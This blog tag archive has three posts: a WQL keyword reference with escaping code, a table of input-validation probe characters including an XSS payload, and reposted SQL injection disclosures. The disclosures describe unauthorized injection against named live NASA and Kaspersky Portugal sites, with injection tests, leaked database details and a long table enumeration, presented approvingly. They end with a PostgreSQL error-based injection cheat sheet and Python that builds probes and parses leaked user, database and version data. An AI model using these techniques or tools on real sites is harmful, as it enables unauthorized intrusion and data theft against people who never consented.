6 posts tagged 'SQL'

  1. 2013.08.22 WQL (SQL for WMI)
  2. 2010.08.12 Input validation characters (1)
  3. 2009.12.11 SQL Error Base SQL Injection
2013.08.22 10:59


The WMI Query Language (WQL) is a subset of the American National Standards Institute Structured Query Language (ANSI SQL)—with minor semantic changes. The following table lists the WQL keywords.

WQL keyword     Meaning
AND             Combines two Boolean expressions, and returns TRUE when both expressions are TRUE.
ASSOCIATORS OF  Retrieves all instances that are associated with a source instance. Use this statement with schema queries and data queries.
__CLASS         References the class of the object in a query.
FROM            Specifies the class that contains the properties listed in a SELECT statement. Windows Management Instrumentation (WMI) supports data queries from only one class at a time.
GROUP clause    Causes WMI to generate one notification to represent a group of events. Use this clause with event queries.
HAVING          Filters the events that are received during the grouping interval that is specified in the WITHIN clause.
IS              Comparison operator used with NOT and NULL. The syntax is IS [NOT] NULL (where NOT is optional).
ISA             Operator that applies a query to the subclasses of a specified class. For more information, see ISA Operator for Event Queries, ISA Operator for Data Queries, and ISA Operator for Schema Queries.
KEYSONLY        Used in REFERENCES OF and ASSOCIATORS OF queries to ensure that the resulting instances are only populated with the keys of the instances, which reduces the overhead of the call.
LIKE            Operator that determines whether or not a given character string matches a specified pattern.
NOT             Comparison operator used in a WQL SELECT query, for example:
                SELECT * FROM meta_class WHERE NOT __class < "Win32" AND NOT __this ISA "Win32_Account"
NULL            Indicates an object does not have an explicitly assigned value. NULL is not equivalent to zero (0) or blank.
OR              Combines two conditions. When more than one logical operator is used in a statement, the OR operators are evaluated after the AND operators.
REFERENCES OF   Retrieves all association instances that refer to a specific source instance. Use this statement with schema and data queries. The REFERENCES OF statement is similar to the ASSOCIATORS OF statement. However, it does not retrieve endpoint instances; it retrieves the association instances.
SELECT          Specifies the properties that are used in a query. For more information, see SELECT Statement for Data Queries, SELECT Statement for Event Queries, or SELECT Statement for Schema Queries.
TRUE            Boolean operator that evaluates to -1 (minus one).
WHERE           Narrows the scope of a data, event, or schema query.
WITHIN          Specifies a polling or grouping interval. Use this clause with event queries.
FALSE           Boolean operator that evaluates to 0 (zero).


Note  Using a WQL key word as an object name can result in a query that cannot be parsed—even when the query compiles without error.
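An added example in Python, not from the MSDN page: it builds statements that use the keywords in the table (SELECT/FROM/WHERE/AND/OR/LIKE/IS NOT NULL, ISA, ASSOCIATORS OF, WITHIN/GROUP/HAVING), escapes string literals so that an untrusted value pasted into a WHERE clause stays a literal instead of rewriting the query, rejects keyword-named identifiers as the note above warns, and, on Windows only, runs data queries through PowerShell's Get-CimInstance (assumed to be available). The class names (Win32_Process, Win32_Service, meta_class, __InstanceCreationEvent) are standard CIM classes; the service name winmgmt and the numbers in the event query are illustrative.

```python
import json
import platform
import subprocess

# Reserved words from the table above (__CLASS is a system property that is
# used as an identifier, so it is deliberately not in this set). WQL matches
# keywords case-insensitively.
WQL_KEYWORDS = {
    "AND", "ASSOCIATORS", "OF", "FROM", "GROUP", "HAVING", "IS", "ISA",
    "KEYSONLY", "LIKE", "NOT", "NULL", "OR", "REFERENCES", "SELECT", "TRUE",
    "WHERE", "WITHIN", "FALSE",
}


def wql_str(value: str) -> str:
    """Quote a value as a WQL string literal. WQL's escape character is the
    backslash, so a backslash is doubled and a quote gets a backslash in
    front of it; without this, a value like  x' OR Name LIKE '%  would
    rewrite the WHERE clause (the same failure as SQL injection)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def ident(name: str) -> str:
    """Accept a class or property name only if it is ASCII [A-Za-z0-9_] and
    not a keyword (the note above: keyword-named objects do not parse)."""
    bare = name.replace("_", "")
    if not bare or not bare.isascii() or not bare.isalnum() or name.upper() in WQL_KEYWORDS:
        raise ValueError(f"unsafe WQL identifier: {name!r}")
    return name


def processes_named(name: str) -> str:
    """SELECT / FROM / WHERE / AND / IS NOT NULL: data query over one class,
    with the untrusted name passed through wql_str."""
    return ("SELECT Name, ProcessId, CommandLine FROM Win32_Process "
            f"WHERE Name = {wql_str(name)} AND CommandLine IS NOT NULL")


def processes_like(pattern: str) -> str:
    """LIKE / OR: pattern match; the WQL wildcard is %."""
    return ("SELECT Name, ProcessId FROM Win32_Process "
            f"WHERE Name LIKE {wql_str(pattern)} OR ParentProcessId = 4")


def subclasses_of(cls: str) -> str:
    """ISA in a schema query: every class derived from cls."""
    return f"SELECT * FROM meta_class WHERE __this ISA {wql_str(ident(cls))}"


def service_host_process(service: str) -> str:
    """ASSOCIATORS OF: the Win32_Process instance that hosts a service."""
    return (f"ASSOCIATORS OF {{Win32_Service.Name={wql_str(service)}}} "
            "WHERE ResultClass = Win32_Process")


def process_burst_event(within: int, group: int, min_events: int) -> str:
    """Event query: poll every `within` seconds, GROUP the process creations
    seen in each `group`-second window into one aggregate notification, and
    keep only windows with more than `min_events` of them (HAVING). This
    is the shape a persistent __EventFilter stores; hand it to
    Register-CimIndicationEvent, not to Get-CimInstance."""
    return ("SELECT * FROM __InstanceCreationEvent WITHIN "
            f"{int(within)} WHERE TargetInstance ISA 'Win32_Process' "
            f"GROUP WITHIN {int(group)} HAVING NumberOfEvents > {int(min_events)}")


def run_wql(query: str, namespace: str = "root/cimv2") -> list:
    """Run a data, schema or association query through PowerShell's
    Get-CimInstance and return the instances as dicts (Windows only)."""
    if platform.system() != "Windows":
        raise RuntimeError("WMI is only available on Windows")
    ps_literal = query.replace("'", "''")  # '' is a literal quote in PowerShell
    script = (f"Get-CimInstance -Namespace '{namespace}' -Query '{ps_literal}' "
              "| Select-Object -Property * -ExcludeProperty Cim* "
              "| ConvertTo-Json -Compress")
    out = subprocess.run(["powershell", "-NoProfile", "-NonInteractive", "-Command", script],
                         capture_output=True, text=True, check=True).stdout.strip()
    if not out:
        return []
    data = json.loads(out)
    return data if isinstance(data, list) else [data]


if __name__ == "__main__":
    for q in (processes_named("x' OR Name LIKE '%"),  # stays one literal
              processes_like("powershell%"),
              subclasses_of("CIM_LogicalDisk"),
              service_host_process("winmgmt"),
              process_burst_event(5, 10, 3)):
        print(q)
    if platform.system() == "Windows":
        for inst in run_wql(service_host_process("winmgmt")):
            print(inst.get("Name"), inst.get("ProcessId"))
```

The escaping in wql_str is the point worth keeping: WMI front ends that splice a host name, user name or process name from a web form straight into a WQL string have the same injection problem as SQL, and the single-quote and backslash rules are WQL's own, not SQL's (SQL doubles the quote instead).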

Related topics

WQL Operators
WQL-Supported Date Formats
WQL-Supported Time Formats

Source: http://msdn.microsoft.com/

2010.08.12 14:43

Input validation characters

Through carelessness during development, unnecessary characters are often allowed through. The table below covers those characters and the meaning they carry when they are passed to the application.

Character                       Details
NULL or null                    Often produces interesting error messages from web applications; can be verified in PL/SQL.
', ";, <!                       Used in SQL strings or queries for SQL, XPath and XML injection testing.
-, =, +, "                      Used in advanced SQL injection queries.
', &, !, |, <, >                Used to find command execution vulnerabilities.
"><script>alert(1)</script>     Used for basic cross-site scripting checks.
%0d, %0a                        Carriage return / line feed (new line); all sorts of special functions.
%7f, %ff                        Byte-length overflows; the maximum 7-bit and 8-bit values.
-1, other                       Integer and underflow vulnerabilities.
Ax1024+                         Overflow vulnerabilities (the letter A repeated 1024 or more times).
%n, %x, %s                      Format string vulnerabilities.
../                             Directory traversal vulnerabilities.
%, _, *                         Wildcard characters; can occasionally expose DoS issues or information disclosure.

These characters can be represented in many different ways (for example, in Unicode). It is important to understand this when restricting input to a given character set.
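An added example in Python, not part of the original post: the probe set from the table above, each probe expanded into the alternative representations the last paragraph warns about (percent-encoded, double-encoded, fullwidth Unicode), run against a naive character blocklist and against an allow-list check that canonicalizes first (percent-decode until stable, then NFKC) and only then validates. The probe strings, the blocklist and the allow-list pattern are constructed for the demonstration.

```python
import re
import unicodedata
from urllib.parse import quote, unquote

# Probe classes from the table, as an application would receive them
# (constructed; "2147483648" stands in for the table's "other" integer).
PROBES = {
    "null": ["NULL", "null", "%00"],
    "sql_xpath_xml": ["'", '"', ";", "<!"],
    "advanced_sql": ["-", "=", "+", '"'],
    "command_exec": ["'", "&", "!", "|", "<", ">"],
    "xss": ['"><script>alert(1)</script>'],
    "crlf": ["%0d", "%0a", "%0d%0a"],
    "high_bytes": ["%7f", "%ff"],
    "integer": ["-1", "2147483648"],
    "overflow": ["A" * 1024],
    "format_string": ["%n", "%x", "%s"],
    "traversal": ["../", "..%2f", "..%255c"],
    "wildcard": ["%", "_", "*"],
}


def encoded_variants(probe: str) -> list:
    """The same probe in the representations the paragraph above refers to:
    raw, percent-encoded, double percent-encoded (for decode-twice bugs) and,
    for printable ASCII, the fullwidth form (U+FF01..U+FF5E) that NFKC maps
    back to ASCII."""
    variants = [probe, quote(probe, safe=""), quote(quote(probe, safe=""), safe="")]
    wide = "".join(chr(ord(c) + 0xFEE0) if 0x21 <= ord(c) <= 0x7E else c for c in probe)
    if wide != probe:
        variants.append(wide)
    return list(dict.fromkeys(variants))  # de-duplicate, keep order


BLOCKED = set("'\";<>|&!")


def naive_blocklist_ok(value: str) -> bool:
    """What careless code does: look for the raw characters and nothing else."""
    return not any(c in BLOCKED for c in value)


def canonicalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded, so a
    pathological input cannot loop), then NFKC-normalize so fullwidth and
    other compatibility forms collapse to their ASCII equivalents."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return unicodedata.normalize("NFKC", value)


def allowlist_ok(value: str, pattern: str = r"[A-Za-z0-9_]{1,64}") -> bool:
    """Validate the canonical form against an explicit pattern. The length
    bound covers the Ax1024 row; the character class covers the rest."""
    return re.fullmatch(pattern, canonicalize(value)) is not None


def bypasses(probe_map=PROBES) -> dict:
    """Per probe class, the variants the naive blocklist lets through but the
    allow-list rejects."""
    found = {}
    for cls, probes in probe_map.items():
        for probe in probes:
            for variant in encoded_variants(probe):
                if naive_blocklist_ok(variant) and not allowlist_ok(variant):
                    found.setdefault(cls, []).append(variant)
    return found


if __name__ == "__main__":
    for cls, variants in bypasses().items():
        print(f"{cls:15s} {variants[:4]}")
```

The order matters: decoding after the check (or normalizing after the check) is exactly what lets %27 or the fullwidth apostrophe U+FF07 through a filter that looks for a plain quote. Validation belongs on the canonical value, and the allow-list should be as narrow as the field permits.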



2009.12.11 13:38

SQL Error Base SQL Injection

1. NASA Full-Disclosure! AGAIN

Ok. First of all, I want to say I made this SQLi public (even though I didn't want to do this), because I saw that somebody else found the vulnerable parameter.
I found this SQLi 3 months ago...
#Why do I test websites?
Because this is my hobby and I want to prove that even big websites, which should be very secure, can be hacked, and this is true and sad at the same time.
I think it's alright what I'm doing, because if somebody else found the vulnerability before me, he/she could do many bad things and much damage (shelling, rooting, backdooring, etc.).

The WebSite Vulnerable: http://saif-1.larc.nasa.gov/ (CEOS Systems Analysis Database)

(True) and 1=1--

(False) and 1=2--


#Version: 5.1.31-community
#User: root@localhost
#Principal Database: ceossadb
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\

Another thing: magic_quotes_gpc=OFF, and the "user" from MySQL has all privileges:


Other Databases:

Tables from ceosvis database:

Tables from principal Database:

I make this public because I see the website is down, and I think the admins are fixing the vulnerability now because someone has reported the problem (sorry, because I didn't make this first, if that was the case).

2. Kaspersky Owned

One evening, when I was searching for an antivirus, I entered the official Kaspersky website of Portugal by mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what I know, has been hacked by "unu" with MySQLi.
So I told myself to try and see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306

pg_exec(): That means it uses a PostgreSQL database.
First, I checked to see if it is injectable, and if I can extract something.
The answer:

True: and 1=1--

False: and 1=2--

So I can do PostgreSQL injection!

What did I extract?
I wasn't concerned about the content; I only "got" the names of databases, tables and columns.

#Principal Database: dbdoc
#User: www-data
#Version: PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

#Other Databases

1 postgres
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig

#The tables from the dbdoc database (count: 458)

1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257

#Me: I think, if this is one of the largest companies in the world, one that protects perhaps many millions of users through its products,
why don't they take care of their own security first of all? This may also be because of the firms that build these websites in a very short time for exaggeratedly large sums...
That's about it.

~Where there is a will, there is a way

3. PostgreSQL Error Base Sql Injection Cheat Sheet with Example

HOWTO Ninja's PostgreSQL Error Base Sql Injection Cheat Sheet with Example

Well, I was playing around with PostgreSQL lately and found a new technique to share..

which is that you may use the CAST function to return results in PostgreSQL error-based SQL injection
for example:

http://target.com/script.php?id=1 and 1=CAST(version() as int)
will return

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 7.4.19" in /home/target.com/public_html/include/server/srCommon.php on line 27
and if the error return like

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: cannot cast type name to integer
you may need to concatenate your statement with some integer number
for example:

http://target.com/script.php?id=1 and 1=CAST(current_user||CHR(58)||current_database()||CHR(58)||version()||CHR(58)||123 as int)
will return for example:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: invalid input syntax for integer: "target_user:target_db:PostgreSQL 7.4.19:123"
in /home/target.com/public_html/include/server/srCommon.php on line 27
cool aite? ;-)
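An added example in Python, not from the original post: the CAST probe from the cheat sheet built from a list of expressions, the pg_exec() warning classified into the two cases the cheat sheet distinguishes (a value echoed in "invalid input syntax", or "cannot cast type ..." meaning the expression must first be concatenated), and the leaked string split back into user, database and version. The two response bodies are constructed from the error text quoted above; the request-side check at the end is a log-review heuristic of my own, not something the page describes.

```python
import re

SENTINEL = 123  # trailing integer the cheat sheet appends to the concatenation


def cast_probe(exprs, sentinel=SENTINEL):
    """Build  1=CAST(e1||CHR(58)||e2||...||sentinel as int)  from PostgreSQL
    expressions. CHR(58) is ':' without using a quote character (so the
    payload survives magic_quotes_gpc / addslashes); the || concatenation
    produces text, so the cast fails with 'invalid input syntax' and echoes
    the whole string, where a bare current_user (type name) would only give
    'cannot cast type name to integer'. sentinel=None builds the plain
    single-expression form, 1=CAST(version() as int)."""
    parts = [str(e) for e in exprs]
    if sentinel is not None:
        parts.append(str(int(sentinel)))
    return "1=CAST(" + "||CHR(58)||".join(parts) + " as int)"


# Error text as PHP prints it. PostgreSQL 10 and later word it
# "invalid input syntax for type integer", which the optional group covers.
CAST_ERROR = re.compile(r'invalid input syntax for (?:type )?integer: "([^"]*)"')
TYPE_CAST_ERROR = re.compile(r"cannot cast type \w+ to integer")


def classify(body):
    """'leak'   : a value was echoed in the error, parse it;
       'concat' : the cast rejected the type, concatenate with || and retry;
       'none'   : no usable PostgreSQL cast error in the response."""
    if CAST_ERROR.search(body):
        return "leak"
    if TYPE_CAST_ERROR.search(body):
        return "concat"
    return "none"


def parse_cast_error(body, fields=("user", "database", "version"), sentinel=SENTINEL):
    """Return the leaked string split into `fields` when it ends with the
    sentinel, {'raw': text} for a single-expression probe, None when the
    body holds no cast error at all."""
    m = CAST_ERROR.search(body)
    if not m:
        return None
    text = m.group(1)
    head, sep, tail = text.rpartition(":")
    if not sep or tail != str(sentinel):
        return {"raw": text}
    values = head.split(":", len(fields) - 1)  # a version string may contain ':'
    if len(values) != len(fields):
        return {"raw": text}
    return dict(zip(fields, values))


# Request-side heuristic (my own, for access-log review): the probe's shape.
PROBE_RE = re.compile(r"(?i)\bcast\s*\(.*\bas\s+int(?:eger)?\s*\)")


def is_cast_probe(query_string):
    return PROBE_RE.search(query_string) is not None


# Constructed response bodies, using the error text quoted above.
LEAK_BODY = ('Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: '
             'invalid input syntax for integer: "target_user:target_db:PostgreSQL 7.4.19:123" '
             'in /home/target.com/public_html/include/server/srCommon.php on line 27')
TYPE_BODY = ('Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: '
             'cannot cast type name to integer')

if __name__ == "__main__":
    print(cast_probe(["current_user", "current_database()", "version()"]))
    for body in (LEAK_BODY, TYPE_BODY, "<html>ok</html>"):
        print(classify(body), parse_cast_error(body))
```

Two things worth noting from the defender's side, both visible in the error text itself: the whole technique depends on the database error being echoed into the HTTP response, so a page that logs pg_exec() failures server-side and returns a generic error gives the attacker only a boolean; and the CAST(... as int) shape in a query string is distinctive enough to alert on.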

Source: http://tinkode.baywords.com
